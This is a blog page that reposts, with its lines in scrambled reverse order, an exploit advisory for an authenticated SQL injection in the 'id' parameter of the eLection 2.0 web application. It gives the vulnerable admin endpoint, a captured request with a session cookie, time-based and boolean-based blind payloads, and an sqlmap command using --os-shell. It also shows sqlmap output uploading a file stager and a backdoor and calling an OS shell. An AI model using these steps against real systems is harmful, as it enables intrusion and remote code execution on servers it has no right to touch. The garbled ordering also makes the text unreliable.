![]() ![]() the file stager has been successfully uploaded on '/opt/lampp/htdocs/election/' - the backdoor has been successfully uploaded on '/opt/lampp/htdocs/election/' - calling OS shell. trying to upload the file stager on '/opt/lampp/htdocs/election/' via LIMIT 'LINES TERMINATED BY' method unable to automatically parse any web server path Title: Generic UNION query (NULL) - 5 columns Payload: aksi=fetch&id=256 AND (SELECT 8551 FROM (SELECT(SLEEP(5)))nYfJ) Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) ![]() Title: AND boolean-based blind - WHERE or HAVING clause Sqlmap -r getcandidate -level=5 -risk=3 -os-shell -p id Send the request to SQLMap with the following parameters: Referer: Content-Type: application/x-www-form-urlencoded charset=UTF-8Ĭookie: el_listing_panitia=5 el_mass_adding=false el_listing_guru=5 el_listing_siswa=5 PHPSESSID=b4f0c3bbccd80e9d55fbe0269a29f96a el_lang=en-us POST /election/admin/ajax/op_kandidat.php HTTP/1.1 Capture the request in BurpSuite and save it to file: # Login to the admin portal and browse to the candidates section. # The eLection Web application is vulnerable to authenticated SQL Injection which leads to remote code execution: Change Mirror Download # Title: eLection 2.0 - 'id' SQL Injection ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. Archives
March 2023
Categories |